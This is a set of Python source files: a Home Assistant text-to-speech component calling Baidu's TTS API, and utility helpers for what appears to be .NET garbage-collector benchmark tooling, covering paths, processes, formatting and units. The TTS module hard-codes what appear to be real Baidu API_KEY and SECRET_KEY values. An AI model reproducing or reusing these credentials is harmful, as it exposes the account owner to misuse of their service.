    chained_dimensions.append(newcomer)
def extract_all_joins_from_join_list(join_list):
    """Flatten a list of per-FROM join lists into one list of joins."""
    flattened = []
    for sublist in join_list:
        flattened.extend(sublist)
    return flattened
def initialize_minofmaxes_and_maxofmins(chain):
    """Seed (max_of_mins, min_of_maxes) from the first dimension in the chain
    that has both bounds; (None, None) when no dimension does.

    Bug fix: the original called next(iter(chain), None) inside its loop,
    re-creating the iterator each pass, so it only ever inspected the FIRST
    element and never found later dimensions with usable bounds (and crashed
    on an empty chain). Scan the chain properly instead.
    """
    max_of_mins = None
    min_of_maxes = None
    for dim in chain:
        max_of_mins, min_of_maxes = dim[0], dim[1]
        if max_of_mins is not None and min_of_maxes is not None:
            break
    return max_of_mins, min_of_maxes
|
api_tts.py | import os, hashlib, asyncio, threading, time, aiohttp, json, urllib, mutagen
from mutagen.mp3 import MP3
from homeassistant.helpers.network import get_url
from homeassistant.helpers import template
from homeassistant.const import (STATE_PLAYING)
# 百度TTS
IS_PY3 = True
from urllib.request import urlopen
from urllib.request import Request
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.parse import quote_plus
API_KEY = '4E1BG9lTnlSeIf1NQFlrSq6h'
SECRET_KEY = '544ca4657ba8002e3dea3ac2f5fdd241'
# 发音人选择, 基础音库:0为度小美,1为度小宇,3为度逍遥,4为度丫丫,
# 精品音库:5为度小娇,103为度米朵,106为度博文,110为度小童,111为度小萌,默认为度小美
PER = 4
# 语速,取值0-15,默认为5中语速
SPD = 5
# 音调,取值0-15,默认为5中语调
PIT = 5
# 音量,取值0-9,默认为5中音量
VOL = 5
# 下载的文件格式, 3:mp3(default) 4: pcm-16k 5: pcm-8k 6. wav
AUE = 3
FORMATS = {3: "mp3", 4: "pcm", 5: "pcm", 6: "wav"}
FORMAT = FORMATS[AUE]
CUID = "123456PYTHON"
TTS_URL = 'http://tsn.baidu.com/text2audio'
class DemoError(Exception):
    """Raised when the Baidu token endpoint returns an unusable response."""
    pass
""" TOKEN start """
TOKEN_URL = 'http://openapi.baidu.com/oauth/2.0/token'
SCOPE = 'audio_tts_post' # 有此scope表示有tts能力,没有请在网页里勾选
def fetch_token():
    """Fetch a Baidu OAuth access token with the TTS scope.

    Returns the access token string; raises DemoError when the response has
    no token or lacks the required scope.
    NOTE(review): API_KEY/SECRET_KEY are hard-coded module constants --
    consider moving them to configuration.
    """
    print("fetch token begin")
    params = {'grant_type': 'client_credentials',
              'client_id': API_KEY,
              'client_secret': SECRET_KEY}
    post_data = urlencode(params)
    if (IS_PY3):
        post_data = post_data.encode('utf-8')
    req = Request(TOKEN_URL, post_data)
    try:
        f = urlopen(req, timeout=5)
        result_str = f.read()
    except URLError as err:
        # On HTTP errors the error object still carries a readable body.
        print('token http response http code : ' + str(err.code))
        result_str = err.read()
    if (IS_PY3):
        result_str = result_str.decode()
    print(result_str)
    result = json.loads(result_str)
    print(result)
    if ('access_token' in result.keys() and 'scope' in result.keys()):
        # The account must actually have TTS permission, not just a token.
        if not SCOPE in result['scope'].split(' '):
            raise DemoError('scope is not correct')
        print('SUCCESS WITH TOKEN: %s ; EXPIRES IN SECONDS: %s' % (result['access_token'], result['expires_in']))
        return result['access_token']
    else:
        raise DemoError('MAYBE API_KEY or SECRET_KEY not correct: access_token or scope not found in token response')
""" TOKEN end """
class ApiTTS():
    """Text-to-speech via the Baidu TTS HTTP API, played through the bound
    media player; interrupts and then resumes any current playback."""

    def __init__(self, media, cfg):
        # media: owning media-player wrapper; cfg: component configuration.
        self.hass = media._hass
        self.media = media
        self.media_position = None  # playback position saved while TTS interrupts
        self.media_url = None       # media URL saved while TTS interrupts
        self.thread = None          # worker thread running async_tts
        self.tts_before_message = cfg['tts_before_message']
        self.tts_after_message = cfg['tts_after_message']
        tts_mode = cfg['tts_mode']
        # Fall back to mode 4 when the configured mode is out of range.
        if [1, 2, 3, 4].count(tts_mode) == 0:
            tts_mode = 4
        tts_volume = 0
        tts_config = media.api_config.get_tts()
        if tts_config is not None:
            tts_mode = tts_config.get('mode', 4)
            tts_volume = tts_config.get('volume', 0)
        # TTS voice mode (1-4, selects the Baidu voice)
        self.tts_mode = tts_mode
        # TTS playback volume in percent (0 means "keep current volume")
        self.tts_volume = tts_volume

    def log(self, name, value):
        # Prefixed logging through the media wrapper.
        self.media.log('【文本转语音】%s:%s', name, value)

    # Run the TTS flow: pause current playback, speak, then resume.
    def async_tts(self, text):
        # If something is playing, pause it and remember URL + position.
        if self.media._media_player != None and self.media.state == STATE_PLAYING:
            self.media.media_pause()
            self.media_position = self.media.media_position
            self.media_url = self.media.media_url
        # Speak the text (blocks for the clip duration).
        self.play_url(text)
        # Resume the interrupted stream at the saved position.
        if self.media_url is not None:
            self.log('恢复当前播放URL', self.media_url)
            #self.media._media_player.load(self.media_url)
            #time.sleep(2)
            self.log('恢复当前进度', self.media_position)
            #self.media._media_player.seek(self.media_position)
            #self.media._media_player.play()
            self.media._media_player.reloadURL(self.media_url, self.media_position)
            self.media_url = None

    # Synthesize (or reuse a cached) MP3 for the text and play it.
    def play_url(self, text):
        # A pre-rendered voice file name may be passed directly.
        if text.find('voice-') == 0:
            f_name = text
        else:
            # Cache key: md5 of text + voice mode.
            f_name = 'tts-' + self.media.api_config.md5(text + str(self.tts_mode)) + ".mp3"
        # Ensure the tts cache directory exists.
        _dir = self.hass.config.path("tts")
        self.media.api_config.mkdir(_dir)
        # Full path of the cached audio file.
        ob_name = _dir + '/' + f_name
        self.log('本地文件路径', ob_name)
        # Download from Baidu TTS if not cached yet.
        if os.path.isfile(ob_name) == False:
            token = fetch_token()
            tex = quote_plus(text)  # the text must be urlencoded twice in total
            print(tex)
            # Map mode 1-4 to the Baidu 'per' (voice person) parameter.
            per = [1, 0, 3, 4][self.tts_mode - 1]
            params = {'tok': token, 'tex': tex, 'per': per, 'spd': SPD, 'pit': PIT, 'vol': VOL, 'aue': AUE, 'cuid': CUID,
                      'lan': 'zh', 'ctp': 1}  # 'lan' and 'ctp' are fixed by the API
            data = urlencode(params)
            urllib.request.urlretrieve(TTS_URL + '?' + data, ob_name)
            # Tag the MP3 with the spoken text as its title.
            meta = mutagen.File(ob_name, easy=True)
            meta['title'] = text
            meta.save()
        else:
            # Already cached: wait one second before playing.
            time.sleep(1)
        # Build the locally-served playback URL.
        local_url = get_url(self.hass).strip('/') + '/tts-local/' + f_name
        self.log('本地URL', local_url)
        if self.media._media_player != None:
            self.media._media_player.is_tts = True
            # Remember the current volume so it can be restored afterwards.
            volume_level = self.media.volume_level
            # Apply the configured TTS volume when non-zero.
            if self.tts_volume > 0:
                print('设置TTS音量:%s'%(self.tts_volume))
                self.media._media_player.set_volume_level(self.tts_volume / 100)
            # Remember the playback rate.
            rate = self.media._media_player.rate
            # Play the TTS clip.
            self.media._media_player.load(local_url)
            # Block for the clip's duration (+3s margin) before restoring state.
            audio = MP3(ob_name)
            self.log('音频时长', audio.info.length)
            time.sleep(audio.info.length + 3)
            self.media._media_player.is_tts = False
            # Restore playback rate and volume.
            self.media._media_player.set_rate(rate)
            print('恢复音量:%s'%(volume_level))
            self.media._media_player.set_volume_level(volume_level)

    async def speak(self, call):
        """Service entry point: resolve the text (possibly a HA template) and
        speak it on a worker thread, joining any previous one first."""
        try:
            if isinstance(call, str):
                text = call
            else:
                text = call.data.get('text', '')
                if text == '':
                    # Render the Home Assistant template in 'message'.
                    tpl = template.Template(call.data['message'], self.hass)
                    text = self.tts_before_message + tpl.async_render(None) + self.tts_after_message
            self.log('解析后的内容', text)
            # Serialize TTS requests: wait for the previous clip to finish.
            if self.thread != None:
                self.thread.join()
            self.thread = threading.Thread(target=self.async_tts, args=(text,))
            self.thread.start()
        except Exception as ex:
            self.log('出现异常', ex)
util.py | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
from __future__ import annotations # Allow subscripting Popen
from dataclasses import dataclass, replace
from datetime import timedelta
from difflib import get_close_matches
from enum import Enum
from functools import reduce
from inspect import getfile
from math import ceil, floor, inf, isclose, isnan
from operator import mul
import os
from os import kill, name as os_name
from os.path import splitext
from pathlib import Path
from platform import node
from signal import signal, SIGINT
from subprocess import DEVNULL, PIPE, Popen, run
from stat import S_IREAD, S_IWRITE, S_IRUSR, S_IWUSR, S_IRGRP, S_IWGRP, S_IROTH, S_IWOTH
from statistics import median, StatisticsError
from sys import argv
from threading import Event, Thread
from time import sleep, time
from typing import Any, Callable, cast, Dict, Iterable, List, Mapping, Optional, Sequence, Union
from xml.etree.ElementTree import Element, parse as parse_xml
from psutil import process_iter
from result import Err, Ok, Result
from .collection_util import add, find, identity, is_empty, min_max_float
from .option import option_or
from .type_utils import check_cast, T, U, V, with_slots
def remove_str_start(s: str, start: str) -> str:
    """Strip the required prefix *start* from *s* (asserts it is present)."""
    assert s.startswith(start), f"Expected {s} to start with {repr(start)}"
    prefix_length = len(start)
    return s[prefix_length:]
def remove_str_end(s: str, end: str) -> str:
    """Strip the required suffix *end* from *s* (asserts it is present).

    Bug fix: the original returned s[:-len(end)], which is s[:0] == "" when
    *end* is the empty string; an explicit end index handles that case.
    """
    assert s.endswith(end), f"Expected {s} to end with {end}"
    return s[: len(s) - len(end)]
def remove_str_start_end(s: str, start: str, end: str) -> str:
    """Strip a required prefix and a required suffix in one call."""
    without_prefix = remove_str_start(s, start)
    return remove_str_end(without_prefix, end)
def try_remove_str_start(s: str, start: str) -> Optional[str]:
    """Like remove_str_start, but returns None when the prefix is absent."""
    if not s.startswith(start):
        return None
    return s[len(start) :]
def try_remove_str_end(s: str, end: str) -> Optional[str]:
    """Like remove_str_end, but returns None when the suffix is absent."""
    return s[: -len(end)] if s.endswith(end) else None
def remove_char(s: str, char: str) -> str:
    """Delete every occurrence of the character(s) in *char* from *s*."""
    deletion_table = str.maketrans("", "", char)
    return s.translate(deletion_table)
def ensure_empty_dir(dir_path: Path) -> None:
    """Create *dir_path* if needed and remove everything inside it."""
    ensure_dir(dir_path)
    clear_dir(dir_path)
def unlink_if_exists(path: Path) -> None:
    """Delete *path* if it exists; silently do nothing otherwise.

    Uses EAFP instead of an exists()/unlink() pair, which had a TOCTOU race
    (the file could disappear between the check and the delete).
    """
    try:
        path.unlink()
    except FileNotFoundError:
        pass
def clear_dir(dir_path: Path) -> None:
    """Recursively delete the contents of *dir_path*, keeping the directory.

    Retries on the Windows "directory is not empty" race (e.g. a scanner
    briefly holding a handle).
    Bug fix: `tries` started at 1, so the retry/sleep path below was dead
    code and every OSError was re-raised immediately; allow a few attempts
    as the loop structure intended. Also guard e.strerror being None.
    """
    tries = 3
    while tries > 0:
        try:
            # shutil.rmtree fails: github.com/hashdist/hashdist/issues/113#issuecomment-25374977
            # TODO: avoid str(path)
            for sub in dir_path.iterdir():
                if not sub.is_dir():
                    sub.unlink()
            for sub in dir_path.iterdir():
                assert sub.is_dir()
                clear_dir(sub)
                sub.rmdir()
        except OSError as e:
            tries -= 1
            # Only the "not empty" race is worth retrying; anything else is fatal.
            if tries <= 0 or "The directory is not empty" not in (e.strerror or ""):
                raise
            sleep(1)
        else:
            break
def ensure_dir(dir_path: Path) -> None:
    """Create *dir_path* (and any missing ancestors) if it does not exist."""
    if dir_path.exists():
        return
    # Guard against infinite recursion at the filesystem root.
    assert dir_path.parent != dir_path
    ensure_dir(dir_path.parent)
    dir_path.mkdir()
def get_factor_diff(old: float, new: float) -> float:
    """Relative change from *old* to *new*; signed infinity when old == 0
    and new != 0, and 0 when both are 0."""
    if old != 0:
        return (new - old) / old
    if new == 0:
        return 0
    return inf if new > 0 else -inf
def get_max_factor_diff(values: Iterable[float]) -> Optional[float]:
    """Factor diff between the min and max of *values*; None for empty input."""
    extremes = min_max_float(values)
    if extremes is None:
        return None
    return get_factor_diff(*extremes.to_pair())
def product(values: Sequence[float]) -> float:
    """Multiply all values together (TypeError on an empty sequence, as reduce)."""
    return reduce(lambda acc, factor: acc * factor, values)
def geometric_mean(values: Sequence[float]) -> float:
    """Geometric mean of strictly-positive values."""
    # Geometric mean is undefined for non-positive inputs.
    assert all(v > 0 for v in values)
    count = len(values)
    # 'pow' is typed as returning Any; check_cast pins the result to float.
    return check_cast(float, pow(product(values), 1.0 / count))
def assert_is_percent(p: float) -> bool:
    # NOTE(review): despite the name, this RETURNS the range check instead of
    # asserting it; callers presumably wrap it in their own assert. The return
    # annotation is corrected from float to bool to match the actual value.
    return 0 <= p <= 100
def get_percent(f: float) -> float:
    """Convert a fraction to a percentage."""
    return 100 * f
def percent_to_fraction(p: float) -> float:
    """Convert a percentage to a fraction."""
    fraction = p / 100
    return fraction
def float_to_str(f: float) -> str:
    """Format *f* compactly: fixed-point with ~3 significant digits inside
    [0.001, 10000), scientific notation outside; sanity-checked for closeness."""
    if f == 0:
        return "0"
    if isnan(f):
        return "NaN"
    magnitude = abs(f)
    if 0.001 <= magnitude < 10000:
        # Pick just enough decimals to keep roughly 3 significant digits.
        for bound, fmt in ((0.01, "%.5f"), (0.1, "%.4f"), (1, "%.3f"), (10, "%.2f"), (100, "%.1f")):
            if magnitude < bound:
                break
        else:
            fmt = "%.0f"
    else:
        fmt = "%.2e"
    res = fmt % f
    # The rendered text must round-trip close to the original value.
    assert isclose(float(res), f, rel_tol=5e-3)
    return res
def float_to_str_smaller(f: float) -> str:
    """Like float_to_str but with fewer digits (~2 significant figures)."""
    if f == 0:
        return "0"
    if isnan(f):
        return "NaN"
    magnitude = abs(f)
    if 0.01 <= magnitude < 1000:
        for bound, fmt in ((0.1, "%.3f"), (1, "%.2f"), (10, "%.1f")):
            if magnitude < bound:
                break
        else:
            fmt = "%.0f"
    else:
        fmt = "%.1e"
    res = fmt % f
    # Looser round-trip tolerance than float_to_str, matching the fewer digits.
    assert isclose(float(res), f, rel_tol=5e-2)
    return res
def _assert_exists(path: Path) -> Path:
    """Assert *path* exists on disk and return it (for call chaining)."""
    assert path.exists(), f"Could not find {path}"
    return path
def assert_file_exists(path: Path) -> Path:
    """Assert *path* is an existing regular file and return it."""
    assert path.exists(), f"Could not find {path}"
    assert path.is_file(), f"{path} is not a file"
    return path
def assert_dir_exists(path: Path) -> Path:
    """Assert *path* is an existing directory and return it."""
    assert path.exists(), f"Could not find {path}"
    assert path.is_dir(), f"{path} is not a directory"
    return path
def make_absolute_path(path: Path) -> Path:
    """Resolve *path* against the current working directory when relative."""
    return path if path.is_absolute() else Path.cwd() / path
def get_existing_absolute_path(path: object, message: Optional[Callable[[], str]] = None) -> Path:
    """Validate that *path* is a str naming an absolute, existing path.

    *message* optionally overrides the "should be absolute" assertion text.
    """
    assert isinstance(path, str)
    candidate = Path(path)
    assert candidate.is_absolute(), (
        f"Path {path} should be absolute" if message is None else message()
    )
    assert candidate.exists(), f"Could not find {candidate}"
    return candidate
def get_existing_absolute_file_path(
    path: object, message: Optional[Callable[[], str]] = None
) -> Path:
    """Validate that *path* is a str naming an absolute, existing FILE."""
    resolved = get_existing_absolute_path(path, message)
    assert resolved.is_file(), f"Path {resolved} exists, but is not a file"
    return resolved
def stdev_frac(stdv: float, avg: float) -> float:
    """Coefficient of variation; degenerates to 0 (or 1) when avg is zero."""
    if avg != 0.0:
        return stdv / avg
    return 0.0 if stdv == 0.0 else 1.0
def os_is_windows() -> bool:
    """True when running on Windows (get_os only yields posix or windows)."""
    return get_os() == OS.windows
class OS(Enum):
    """The two operating-system families this tooling distinguishes."""

    posix = 0
    windows = 1
def get_os() -> OS:
    """Map os.name onto the OS enum (KeyError for anything exotic)."""
    mapping = {"nt": OS.windows, "posix": OS.posix}
    return mapping[os_name]
@with_slots
@dataclass(frozen=True)
class ExecArgs:
    """Everything needed to launch one child process."""

    cmd: Sequence[str]
    cwd: Optional[Path] = None
    env: Optional[Mapping[str, str]] = None
    # Don't print the command before running
    quiet_print: bool = False
    # Ignore print to stdout
    quiet_stdout: bool = False
    # Ignore print to stderr
    quiet_stderr: bool = False

    def print(self) -> None:
        """Echo the command line unless quiet_print is set."""
        if not self.quiet_print:
            print(self)

    def __str__(self) -> str:
        s = " ".join(self.cmd)
        if self.cwd is not None:
            s += f" (cwd {self.cwd})"
        # printing env is too verbose
        return s
def args_with_cmd(a: ExecArgs, cmd: Sequence[str]) -> ExecArgs:
    """Copy *a* with a different command line."""
    # Note: replace is not type-safe, so putting this near the definition of cmd
    return replace(a, cmd=cmd)
AnyPopen = Union["Popen[str]", "Popen[bytes]"]
def is_process_alive(process: AnyPopen) -> bool:
    """True while the process has not exited (poll() returns no returncode)."""
    exit_code = process.poll()
    return exit_code is None
class ExecError(Exception):
    """Raised when a launched process exits with a non-zero code."""
    pass
def _call_and_allow_interrupts(args: ExecArgs) -> timedelta:
    """Run *args* to completion, forwarding Ctrl-C to the child process.

    Returns the wall-clock duration; raises ExecError on a non-zero exit.
    """
    start_time_seconds = time()
    process = Popen(
        args.cmd,
        cwd=args.cwd,
        env=args.env,
        stdout=DEVNULL if args.quiet_stdout else None,
        stderr=DEVNULL if args.quiet_stderr else None,
    )

    def handler(sig: int, _: Any) -> None:  # TODO: `_: FrameType`
        # Forward the signal to the child, then abort ourselves.
        process.send_signal(sig)
        raise KeyboardInterrupt

    signal(SIGINT, handler)
    exit_code = process.wait()
    if exit_code != 0:
        quiet_warning = " (Try running without 'quiet_stderr')" if args.quiet_stderr else ""
        raise ExecError(f"Process {args.cmd} failed with exit code {exit_code}{quiet_warning}")
    return timedelta(seconds=time() - start_time_seconds)
def exec_cmd(args: ExecArgs) -> timedelta:
    """Print (unless quiet) and run the command; return its wall-clock time."""
    args.print()
    return _call_and_allow_interrupts(args)
@with_slots
@dataclass(frozen=True)
class BenchmarkRunErrorInfo:
    """One failed benchmark iteration: name, iteration, message and trace."""

    name: str
    iteration_num: int
    message: str
    trace: List[str]

    def print(self) -> None:
        """Pretty-print the failure, including the rebuilt stack trace."""
        print(
            f"- Benchmark: '{self.name}' -\n"
            f"Iteration: {self.iteration_num}\n"
            f"Error Message: {self.message}\n"
            f"\nStack Trace:\n{self.__rebuild_trace()}\n"
        )

    def __rebuild_trace(self) -> str:
        # The trace is stored as raw lines; join them back into one string.
        return "".join(self.trace)
@with_slots
@dataclass(frozen=True)
class ConfigRunErrorInfo:
    """Errors for one configuration: the benchmarks that failed under it."""

    name: str
    benchmarks_run: BenchmarkErrorList

    def print(self) -> None:
        print(f"=== Configuration '{self.name}' ===\n")
        for bench in self.benchmarks_run:
            bench.print()

    def add_benchmark(self, new_bench: BenchmarkRunErrorInfo) -> None:
        # The dataclass is frozen, but the list field itself is mutable.
        self.benchmarks_run.append(new_bench)
@with_slots
@dataclass(frozen=True)
class CoreRunErrorInfo:
    """Errors for one core (coreclr build): configs that failed under it."""

    name: str
    configs_run: ConfigurationErrorMap

    def print(self) -> None:
        print(f"===== Core '{self.name}' =====\n")
        for config in self.configs_run.values():
            config.print()

    def add_config(self, new_config: ConfigRunErrorInfo) -> None:
        # `add` asserts the key is not already present.
        add(self.configs_run, new_config.name, new_config)
@with_slots
@dataclass(frozen=True)
class ExecutableRunErrorInfo:
    """Errors for one executable: the cores that failed under it."""

    name: str
    coreclrs_run: CoreErrorMap

    def print(self) -> None:
        print(f"======= Executable '{self.name}' =======\n")
        for coreclr in self.coreclrs_run.values():
            coreclr.print()

    def add_coreclr(self, new_coreclr: CoreRunErrorInfo) -> None:
        # `add` asserts the key is not already present.
        add(self.coreclrs_run, new_coreclr.name, new_coreclr)
RunErrorMap = Dict[str, ExecutableRunErrorInfo]
CoreErrorMap = Dict[str, CoreRunErrorInfo]
ConfigurationErrorMap = Dict[str, ConfigRunErrorInfo]
BenchmarkErrorList = List[BenchmarkRunErrorInfo]
def add_new_error(
    run_errors: RunErrorMap,
    exec_name: str,
    core_name: str,
    config_name: str,
    bench_name: str,
    iteration_num: int,
    message: str,
    trace: List[str],
) -> None:
    """Record a failed iteration under executable -> core -> config ->
    benchmark, creating each missing level of the hierarchy on the way down."""
    if exec_name not in run_errors:
        # Entirely new executable: build the whole chain in one go.
        bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
        config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
        coreclr_dict = {core_name: CoreRunErrorInfo(core_name, config_dict)}
        add(run_errors, exec_name, ExecutableRunErrorInfo(exec_name, coreclr_dict))
    else:
        exec_info = run_errors[exec_name]
        if core_name not in exec_info.coreclrs_run:
            bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
            config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
            exec_info.add_coreclr(CoreRunErrorInfo(core_name, config_dict))
        else:
            core_info = exec_info.coreclrs_run[core_name]
            if config_name not in core_info.configs_run:
                bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
                core_info.add_config(ConfigRunErrorInfo(config_name, bench_list))
            else:
                # Deepest case: only the benchmark entry itself is new.
                config_info = core_info.configs_run[config_name]
                config_info.add_benchmark(
                    BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)
                )
@with_slots
@dataclass(frozen=True)
class WaitOnProcessResult:
    """Outcome of waiting for a process under a timeout."""

    stdout: str
    # None if timed out
    time_taken: Optional[timedelta]
def exec_start(args: ExecArgs, pipe_stdout: bool, pipe_stdin: bool = False) -> Popen[str]:
    """Launch the command described by *args* and return its Popen handle."""
    args.print()
    # Silencing stdout and piping it are mutually exclusive requests.
    assert not (args.quiet_stdout and pipe_stdout)
    if args.quiet_stdout:
        out = DEVNULL
    elif pipe_stdout:
        out = PIPE
    else:
        out = None
    working_dir = str(args.cwd) if args.cwd is not None else None
    return Popen(
        args.cmd,
        env=args.env,
        cwd=working_dir,
        stdin=PIPE if pipe_stdin else None,
        stdout=out,
        text=True,
    )
def wait_on_process_with_timeout(
    process: Popen[str], start_time_seconds: float, timeout_seconds: float
) -> WaitOnProcessResult:
    """Wait for *process*, killing it if it exceeds *timeout_seconds*.

    Returns the captured stdout and the elapsed time; time_taken is None
    when the process had to be killed.
    """
    assert is_process_alive(process)
    done = Event()
    killed = False

    def process_kill_function() -> None:
        # Watchdog thread: blocks until the main thread signals completion
        # or the timeout elapses, whichever comes first.
        nonlocal killed
        is_done = done.wait(timeout=timeout_seconds)
        if not is_done and is_process_alive(process):
            print(f"Process timed out after {timeout_seconds} seconds! Sending SIGINT")
            # process.send_signal(SIGINT) # This causes ValueError: Unsupported signal: 2
            kill_process(process, time_allowed_seconds=1)
            killed = True

    process_killer = Thread(target=process_kill_function)
    process_killer.start()
    # communicate() blocks until the process exits (or the watchdog kills it).
    stdout, stderr = process.communicate()
    assert stderr is None  # stderr was not piped, so nothing is captured
    returncode = process.wait()
    end_time_seconds = time()
    # If the process exited normally early, process_kill_function can exit.
    # (If it was killed, this will have no effect)
    done.set()
    process_killer.join()
    assert returncode == process.returncode
    assert killed or process.returncode == 0, f"Process failed with code {process.returncode}"
    return WaitOnProcessResult(
        stdout=stdout,
        time_taken=None if killed else timedelta(seconds=(end_time_seconds - start_time_seconds)),
    )
def kill_process(process: AnyPopen, time_allowed_seconds: float) -> None:
    """Ask *process* to stop with SIGINT; force-kill if it ignores us.

    Polls once per second; after *time_allowed_seconds* without exit,
    escalates to an unconditional kill().
    """
    assert is_process_alive(process)
    # Polite first attempt: SIGINT lets the process run cleanup handlers.
    kill(process.pid, SIGINT)
    start_time_seconds = time()
    while is_process_alive(process):
        sleep(1)
        if (time() - start_time_seconds) > time_allowed_seconds:
            print(
                f"Process '{check_cast(str, process.args)}' refused to shut down normally. "
                + "Trying again without asking nicely."
            )
            process.kill()
            break
    assert not is_process_alive(process)
class ExecutableNotFoundException(Exception):
    """Raised when the executable at *path* cannot be found."""

    def __init__(self, path: Path):
        super().__init__(f"Cannot find {path}")
        self.path = path
@with_slots
@dataclass(frozen=True)
class OutputAndExitCode:
    """Captured stdout plus the process exit code."""

    stdout: str
    exit_code: int
def exec_and_get_output_and_exit_code(args: ExecArgs) -> OutputAndExitCode:
    """Run *args* to completion and capture its stdout and exit code."""
    args.print()
    # These arguments don't apply here, should have their default values
    assert args.quiet_stdout is False and args.quiet_stderr is False
    try:
        completed = run(args.cmd, stdout=PIPE, cwd=args.cwd, env=args.env, check=False)
    except FileNotFoundError:
        raise ExecutableNotFoundException(Path(args.cmd[0])) from None
    except NotADirectoryError:
        raise Exception(f"Invalid cwd: {args.cwd}") from None
    return OutputAndExitCode(decode_stdout(completed.stdout), completed.returncode)
def exec_and_get_output(args: ExecArgs, expect_exit_code: Optional[int] = None) -> str:
    """Run *args*, assert the exit code matches (default 0), return stdout."""
    expected = option_or(expect_exit_code, 0)
    result = exec_and_get_output_and_exit_code(args)
    assert result.exit_code == expected, (
        f"Returned with code {result.exit_code}, expected {expected}"
    )
    return result.stdout
@with_slots
@dataclass(frozen=True)
class ProcessResult:
    """Full result of a completed process: exit code plus both streams."""

    exit_code: int
    stdout: str
    stderr: str
def exec_and_get_result(args: ExecArgs) -> ProcessResult:
    """Run *args* and capture exit code, stdout, and stderr."""
    args.print()
    # These arguments don't apply here, should have their default values
    assert args.quiet_stdout is False and args.quiet_stderr is False
    try:
        proc = run(args.cmd, stdout=PIPE, stderr=PIPE, cwd=args.cwd, env=args.env, check=False)
    except FileNotFoundError:
        raise Exception(f"Cannot find {args.cmd[0]}") from None
    return ProcessResult(
        exit_code=proc.returncode,
        stdout=decode_stdout(proc.stdout),
        stderr=decode_stdout(proc.stderr),
    )
def decode_stdout(stdout: bytes) -> str:
    """Decode captured output: drop the 0xAE byte (Microsoft trademark
    confuses python), UTF-8 decode, trim, and remove carriage returns."""
    cleaned = stdout.replace(b"\xae", b"")
    text = cleaned.decode("utf-8")
    return text.strip().replace("\r", "")
def exec_and_expect_output(args: ExecArgs, expected_output: str, err: str) -> None:
    """Run *args* and raise Exception(err) unless stdout equals *expected_output*."""
    actual = exec_and_get_output(args)
    if actual == expected_output:
        return
    print("actual:", repr(actual))
    print("expect:", repr(expected_output))
    raise Exception(err)
# Binary (power-of-two) size multipliers.
_BYTES_PER_KB: int = 2 ** 10
_BYTES_PER_MB: int = 2 ** 20
_BYTES_PER_GB: int = 2 ** 30
def bytes_to_kb(n_bytes: Union[int, float]) -> float:
    """Convert a byte count to KB (1 KB = 1024 bytes here)."""
    return n_bytes / _BYTES_PER_KB
def bytes_to_mb(n_bytes: Union[int, float]) -> float:
    """Convert a byte count to MB (1 MB = 2**20 bytes here)."""
    return n_bytes / _BYTES_PER_MB
def bytes_to_gb(n_bytes: Union[int, float]) -> float:
    """Convert a byte count to GB (1 GB = 2**30 bytes here)."""
    return n_bytes / _BYTES_PER_GB
def kb_to_bytes(kb: float) -> int:
    """Convert KB to a whole number of bytes (rounded)."""
    return round(kb * _BYTES_PER_KB)
def mb_to_bytes(mb: float) -> int:
    """Convert MB to a whole number of bytes (rounded)."""
    return round(mb * _BYTES_PER_MB)
def gb_to_bytes(gb: float) -> int:
    """Convert GB to a whole number of bytes (rounded)."""
    return round(gb * _BYTES_PER_GB)
def kb_to_mb(kb: float) -> float:
    """Convert KB to MB (goes through a rounded byte count)."""
    return bytes_to_mb(kb_to_bytes(kb))
def mb_to_gb(mb: float) -> float:
    """Convert MB to GB (goes through a rounded byte count)."""
    return bytes_to_gb(mb_to_bytes(mb))
def gb_to_mb(gb: float) -> float:
    """Convert GB to MB (goes through a rounded byte count)."""
    return bytes_to_mb(gb_to_bytes(gb))
# Sub-second time multipliers.
MSECS_PER_SECOND = 1000
USECS_PER_SECOND = 1_000_000
def show_size_bytes(n_bytes: float) -> str:
    """Format a byte count using the largest unit it fits (GB/MB/KB/bytes)."""
    size_units = (
        Unit(_BYTES_PER_GB, "GB"),
        Unit(_BYTES_PER_MB, "MB"),
        Unit(_BYTES_PER_KB, "KB"),
    )
    return show_in_units(n_bytes, size_units, Unit(1, "bytes"))
@with_slots
@dataclass(frozen=True)
class Unit:
    """A display unit: its size in base units, and its printed label."""

    amount: float
    name: str
def show_in_units(amount: float, units: Sequence[Unit], base_unit: Unit) -> str:
    """Render *amount* using the first unit it is at least one of."""
    # Find a unit where this is >= 1 of it
    unit = option_or(find(lambda u: abs(amount) >= u.amount, units), base_unit)
    if unit.amount == 1 and amount % 1 == 0:
        shown = str(amount)
    else:
        shown = "%.2f" % (amount / unit.amount)
    return shown + f" {unit.name}"
def seconds_to_msec(seconds: float) -> float:
    """Convert seconds to milliseconds."""
    return seconds * MSECS_PER_SECOND
def seconds_to_usec(seconds: float) -> float:
    """Convert seconds to microseconds."""
    return seconds * USECS_PER_SECOND
def msec_to_seconds(msec: float) -> float:
    """Convert milliseconds to seconds."""
    return msec / MSECS_PER_SECOND
def mhz_to_ghz(mhz: float) -> float:
    """Convert megahertz to gigahertz."""
    return mhz / 1000
# Python's os.walk won't work, because it takes Strings and not paths.
# Unfortunately `Path(str(path))` isn't the identity if path is `//machine/`. (Python bug?)
def walk_files_recursive(path: Path, filter_dir: Callable[[Path], bool]) -> Iterable[Path]:
    """Yield every file under *path*, descending only into directories
    for which *filter_dir* returns True."""
    for sub in path.iterdir():
        if sub.is_dir():
            if filter_dir(sub):
                # `yield from` instead of the manual re-yield loop.
                yield from walk_files_recursive(sub, filter_dir)
        else:
            yield sub
def get_hostname() -> str:
    """Return this machine's hostname.

    `node` is imported at module level (not visible in this chunk) —
    presumably ``platform.node``; confirm against the file's imports.
    """
    return node()
# TODO:MOVE
def assert_admin() -> None:
    """Fail fast unless running with administrator/root privileges."""
    if is_admin():
        return
    if os_is_windows():
        reason = "PerfView requires you to be an administrator"
    else:
        reason = "cgcreate requires you to be a super user"
    raise Exception(reason)
def is_admin() -> bool:
    """True when the current user is an administrator (Windows) or root (POSIX)."""
    if os_is_windows():
        # Do this import lazily as it is only available on Windows
